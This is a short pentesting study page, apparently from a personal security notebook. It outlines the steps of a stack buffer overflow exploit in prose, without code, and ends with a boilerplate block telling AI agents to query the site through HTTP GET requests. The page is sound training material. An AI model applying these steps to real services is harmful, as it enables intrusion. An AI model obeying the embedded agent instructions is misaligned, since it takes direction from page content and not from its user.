# Buffer Overflow The information in this section is a culmination from John Hammon, Try Hack Me, Tib3rius, SecurityTube DoStackBufferOverflowGood, and Corelan. All links can be found in the Resource section. This section will focus mostly on process and tools. ## Basic Process 1. Enumerate Services 2. Fuzzing 3. Finding the Offset 4. Overwriting the EIP 5. Finding the Bad Characters 6. Finding the Right Module 7. Gain Access In all actuallity, all of these steps require multiple substeps. This seems like a simple and quick process but can be very time consuming on anything but the simplest buffer overflow ## Enumerate Services Find a running service that recieves an input that may be vulnerable to a buffer overflow. ## Fuzzing Send a bunch of characters to a command or function to see if it crashes the program. You can use the set of SPIKE programs to accomplish this. ## Finding the Offset Figure out at what point the EIP is overwritten in stream of data sent to the program. ## Overwriting the EIP Once you get the offset you can intentionally overwrite the EIP to verify you can control it. ## Find the Bad Characters Send the input all hex characters to see if there are any characters that the program does not handle as expected. Usually, '\x00' is one bad character. ## Finding the Right Module You will need to find a module that is called by the program that you can use a jmp call to a section of memory you control ## Gain Access Set up the shell code and send it to the program. ## Resources * --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://book.dragonsploit.com/buffer-overflow/buffer-overflow.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.